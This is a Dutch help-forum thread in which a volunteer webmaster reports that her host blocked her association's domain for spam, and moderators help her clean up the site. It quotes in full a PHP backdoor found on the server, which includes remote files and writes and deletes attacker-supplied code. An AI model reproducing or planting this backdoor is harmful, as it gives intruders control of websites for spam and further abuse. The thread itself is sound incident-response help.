Domeinnaam geblokkeerd

Nvu, Kompozer en Bluegriffon zijn open source (WYSIWYG) programma's waarmee je een website kunt maken en onderhouden (vergelijkbaar met FrontPage / Dreamweaver).
Miekmol
Berichten: 74
Lid geworden op: 15 november 2010, 21:18
    Windows 7 Internet Explorer 8

Domeinnaam geblokkeerd

Bericht door Miekmol »

Goedenavond,

Het is alweer een tijdje geleden dat ik hier een vraag heb gesteld.
Nu is echter vandaag de website geblokkeerd.

Ik kreeg de volgende melding:

Code: Selecteer alles

Vandaag is jouw domeinnaam houvastgemert-bakel.nl geblokkeerd op onze servers.

De reden hiervoor is dat iemand scripts op jouw website heeft misbruikt om grote hoeveelheden ongewenste e-mail de wereld in te sturen.

Je kunt deze blokkade oplossen door de php of perl scripts op je website zodanig aan te passen dat er geen misbruik van gemaakt kan worden. Heb je een standaardproduct zoals phpBB of een ander CMS geïnstalleerd, update dan je website met de nieuwste versie van dit product. Als je dan via de support pagina aan ons doorgeeft dat de gegevens zijn gecorrigeerd kunnen we de bestanden nazien en het domein weer vrijgeven.
Ik begrijp hier absoluut niets van en weet ook niet wat ik er mee aan moet. De website is gemaakt in Kompozer.

Wie weet raad????
Wat moet ik doen, wat zijn php's of perl scripts?

groetjes Miek
Gebruikersavatar
Frederik
Moderator
Berichten: 4263
Lid geworden op: 1 juli 2004, 16:16
Locatie: Vriescheloo
    Windows XP Firefox

Re: Domeinnaam geblokkeerd

Bericht door Frederik »

Dat is een vervelend gebeuren, maar ook een beetje een overdreven reactie van de host. Als je een 'gewone' website hebt gemaakt met KompoZer zonder het gebruik van PHP (programmeertaal) of andere scripttalen, is het bijna uitgesloten dat er een spammer actief is op jouw domein. Het is niet uitgesloten dat er op je domein ingebroken is en dat er misbruikt wordt gemaakt van de e-mail gegevens.
Je kunt met FTP inloggen op je domein en kijken of je bestanden ziet die niet van jouw zijn of verdacht overkomen en verwijderen.
Dat had je host overigens ook kunnen doen zonder afsluiting of blokkering van het domein.
Je kunt ook tegen de host zeggen dat je echt van niks weet en verzoeken de blokkade op te heffen.
Miekmol
Berichten: 74
Lid geworden op: 15 november 2010, 21:18
    Windows 7 Internet Explorer 8

Re: Domeinnaam geblokkeerd

Bericht door Miekmol »

Ik heb ingelogd en zie het volgende staan:

Code: Selecteer alles

<?php //7d2b3da887a173e8f45c7ca1ad2dd0bf
/**
 * @version 2.0
 * 
 */

if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "setup":
                        projectcodes_setup();
                        break;
                case "remove":
                        projectcodes_remove();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {                        
                        include $code;
                }
        }
return;
        
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function projectcodes_setup()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $code = base64_decode($projectcode["code"]);
                $res = new_file_put_contents($mark, $code);
                if($res)
                {
                        $installed[]=$projectcode["id"];
                }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
        
}

function projectcodes_remove()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $res = unlink($mark);
        }
}

function new_file_put_contents($filename, $data)
{
        $f = @fopen($filename, 'w');
        if (!$f)
        {
                return false;
        }
        else
        {
                $bytes = fwrite($f, $data);
                fclose($f);
                return $bytes;
        }
}

function new_file_get_contents($filename)
/* Returns the contents of file name passed
 */
{
        if (!function_exists('file_get_contents'))
        {
                $fhandle = fopen($filename, "r");
                $fcontents = fread($fhandle, filesize($filename));
                fclose($fhandle);
        }
        else
        {
                $fcontents = file_get_contents($filename);
        }
        return $fcontents;
}
?>
Ik weet niet wat dit is... kan ik dit weggooien?

Het is een CC8B script en op 14-11 's nachts om 3.28 uur geupload.

groetjes Mieke
Miekmol
Berichten: 74
Lid geworden op: 15 november 2010, 21:18
    Windows 7 Internet Explorer 8

Re: Domeinnaam geblokkeerd

Bericht door Miekmol »

Aanvulling,

Ik kreeg wel bijna dagelijks een mail van de zogenaamde ABN-AMRO dat in mijn account moest inloggen en gegevens moest doorgeven.
Natuurlijk heb ik die Spam meteen verwijderd, ik ben geeneens klant bij ABN.
Dit is de enige Spam die ik ooit heb gehad.
Is alleen het wachtwoord veranderen niet genoeg???
Gebruikersavatar
Frederik
Moderator
Berichten: 4263
Lid geworden op: 1 juli 2004, 16:16
Locatie: Vriescheloo
    Windows XP Firefox

Re: Domeinnaam geblokkeerd

Bericht door Frederik »

Dat lijkt inderdaad een PHP script van een Rus !
Verwijderen dus. Het wachtwoord van je FTP inderdaad wijzigen en dat zou voldoende moeten zijn.
Loop voor de zekerheid alle mappen na en alles wat op die datum/tijdstip is geupload of aangepast verwijderen.
Miekmol
Berichten: 74
Lid geworden op: 15 november 2010, 21:18
    Windows 7 Internet Explorer 8

Re: Domeinnaam geblokkeerd

Bericht door Miekmol »

Heel hartelijk dank voor je antwoord.
Ik heb het verwijderd en de server gevraagd om de blokkade op te heffen, zodra dat gebeurd is verander ik het wachtwoord.
Nogmaals dank!

met vriendelijke groet
Mieke
Gebruikersavatar
nirwana
Beheerder
Berichten: 11528
Lid geworden op: 19 september 2003, 5:09
    Windows 7 Firefox
Contacteer:

Re: Domeinnaam geblokkeerd

Bericht door nirwana »

Mieke,

Toch blijf ik me wel afvragen hoe ze toegang tot jouw account hebben kunnen krijgen. Is dat ook iets waar jouw hosting-provider uitsluitsel over kan geven ? Ik zou denken dat ze aan de hand van het tijdstip van uploaden en de logbestanden van de FTP-server kunnen kijken of het bestand via FTP is geplaatst. Als dat het geval is dan hebben ze vast ook gelogd vanaf welk IP-adres dat is geupload.

De melding van de hosting-provider suggereert dat je PHP- of Perl-scripts op jouw hosting-ruimte hebt draaien, maar voor zover ik het kan overzien is dat niet het geval.

Het achterhalen van de oorzaak van dit probleem vind ik vooral interessant om zo te weten te komen hoe men binnen is gekomen. Als dat inderdaad via de FTP-server is dan heeft iemand op de een of andere manier jouw gebruikersnaam + wachtwoord onderschept. Als dat 1 keer lukt, dan zou dat ook een volgende keer kunnen gebeuren. Heb je enig idee wie er nog meer op de hoogte zijn van het huidige wachtwoord ?

Het is echter niet gezegd dat men netjes via de FTP-server binnen is gekomen. Het is ook mogelijk om via een zwakheid in de webserver (of een van de scripttalen) binnen te komen. Alleen mag je er vanuit gaan dat de hosting-provider zijn servers goed bijhoudt qua patches. Maar dan blijft alsnog de vraag hoe men dan wel binnen is gekomen. Ik ga er tenminste vanuit dat je zelf geen scripts op jouw website draait. Of heb je ergens zelf een contactformulier geplaatst ? Of misschien een gastenboek ?

Ik denk overigens dat die mail van de ABN-Amro (of die van de ABN-Amro zou moeten zijn) hier los van staat. Zelf krijg ik ook wel mails van ABN-Amro of de ING, maar daar trek ik me weinig van aan. Zie ook www.veiligbankieren.nl
Met vriendelijke groet,

Martijn
[ Mede-oprichter + webmaster MozBrowser | beheerder Startpagina's over freeware, GIMP, Mozilla en OpenOffice.org / LibreOffice, Ubuntu
Miekmol
Berichten: 74
Lid geworden op: 15 november 2010, 21:18
    Windows 7 Internet Explorer 8

Re: Domeinnaam geblokkeerd

Bericht door Miekmol »

Hoi Martijn,

Nu ik er zo eens over nadenk wat je allemaal schrijft, schiet me het volgende te binnen.
Vanaf 14 november haal ik de mail binnen via IMAP in LiveMail.
Dit moest ik zo instellen omdat de mail ook binnengehaald moet worden bij het bestuurslid van de gehandicaptenvereniging.
Nu is dat bij haar nog steeds niet ingesteld wegens ziekte. Wel heb ik haar een mail gestuurd met alle gegevens voor als haar zoon het evt. zou instellen.
Ik weet helemaal niet of IMAP hier iets mee te maken kan hebben.
Het is nogal triest, de secretaris van de gehandicaptenvereniging is plotseling op 58 jarige leeftijd overleden. Sinds die tijd heb ik de website in mijn beheer. Ik ben de enige die alles naar de server stuurt, ik doe dit met FileZilla. Er zijn diverse mensen die het wachtwoord kunnen hebben, maar dat zijn de kinderen van hem, zijn vriendin en een paar leden van de vereniging. Ik geloof gewoon niet dat zij er iets mee te maken hebben.

En nee, ik heb geen gastenboek of contactformulier geplaatst.
Ik ga alles eens navragen bij MijnDomein.
Ik houd je op de hoogte...

groetjes Mieke
Gebruikersavatar
nirwana
Beheerder
Berichten: 11528
Lid geworden op: 19 september 2003, 5:09
    Windows 7 Firefox
Contacteer:

Re: Domeinnaam geblokkeerd

Bericht door nirwana »

Mieke,

Ik wil zeker geen mensen verdacht maken en ik verwacht ook niet dat IMAP hier de boosdoener is. Ik geloof in mensen totdat het tegendeel wordt bewezen.

Maar tegenwoordig worden mailboxen nog wel eens gehackt, dus kan het zijn dat jouw mail is onderschept en zo misbruikt.
Met vriendelijke groet,

Martijn
[ Mede-oprichter + webmaster MozBrowser | beheerder Startpagina's over freeware, GIMP, Mozilla en OpenOffice.org / LibreOffice, Ubuntu
Miekmol
Berichten: 74
Lid geworden op: 15 november 2010, 21:18
    Windows 7 Internet Explorer 8

Re: Domeinnaam geblokkeerd

Bericht door Miekmol »

Ik heb nog steeds geen enkel bericht van Mijn Domein ontvangen, ze reageren gewoon niet.
Het ergste is dat ik ze telefonisch niet bereiken kan.
Dit doen ze om de kosten laag te houden.
Verder staat er op de website dat ze binnen 24 uur contact opnemen... mooi niet dus.
Het is erg vervelend dat de website is geblokkeerd.

groetjes Mieke
Gebruikersavatar
Frederik
Moderator
Berichten: 4263
Lid geworden op: 1 juli 2004, 16:16
Locatie: Vriescheloo
    Windows XP Firefox

Re: Domeinnaam geblokkeerd

Bericht door Frederik »

Verhuiscode opvragen en je website verhuizen. Als je de code hebt, kan binnen 24 uur je website weer online zijn bij een fatsoenlijke host.
http://www.mijndomein.nl/servicedesk/ik ... 50_310_309
Miekmol
Berichten: 74
Lid geworden op: 15 november 2010, 21:18
    Windows 7 Internet Explorer 8

Re: Domeinnaam geblokkeerd

Bericht door Miekmol »

Misschien een domme vraag maar ben ik dan ook mijn emailaccounts kwijt die daar gemaakt zijn?

Krijg ik het resterende bedrag terug, het loopt tot augustus 2012

En wat is volgens jou wel een fatsoenlijke host?

groetjes Mieke
Gebruikersavatar
Frederik
Moderator
Berichten: 4263
Lid geworden op: 1 juli 2004, 16:16
Locatie: Vriescheloo
    Windows XP Firefox

Re: Domeinnaam geblokkeerd

Bericht door Frederik »

Als een domein wordt verhuisd gaat alles mee, internet adres van de website en de e-mail adressen blijven behouden.
Geld krijg je nooit terug, je betaald per jaar, maar dat zou ik voor lief nemen bij deze ellende.
Een fatsoenlijk host is een host die op zijn minst telefonisch bereikbaar is bij problemen.
Dat is de host waar dit forum op draait en vanuit mijn persoonlijke ervaringen kan ik GetHost aanbevelen maar iemand anders zou weer een andere host nemen. Dat is een kwestie van goede ervaringen en prijs.
Miekmol
Berichten: 74
Lid geworden op: 15 november 2010, 21:18
    Windows 7 Internet Explorer 8

Re: Domeinnaam geblokkeerd

Bericht door Miekmol »

Oké, ik zal met het bestuur overleggen of er geld voor is....

groetjes en bedankt
Mieke
Gebruikersavatar
nirwana
Beheerder
Berichten: 11528
Lid geworden op: 19 september 2003, 5:09
    Windows 7 Firefox
Contacteer:

Re: Domeinnaam geblokkeerd

Bericht door nirwana »

Miekmol schreef:Ik heb nog steeds geen enkel bericht van Mijn Domein ontvangen, ze reageren gewoon niet.
Het is vast niet voor niets dat de 2e hit bij zoeken op MijnDomein.nl bij Tros Radar uitkomt: www.google.nl/search?q=mijndomein.nl
Met vriendelijke groet,

Martijn
[ Mede-oprichter + webmaster MozBrowser | beheerder Startpagina's over freeware, GIMP, Mozilla en OpenOffice.org / LibreOffice, Ubuntu
Plaats reactie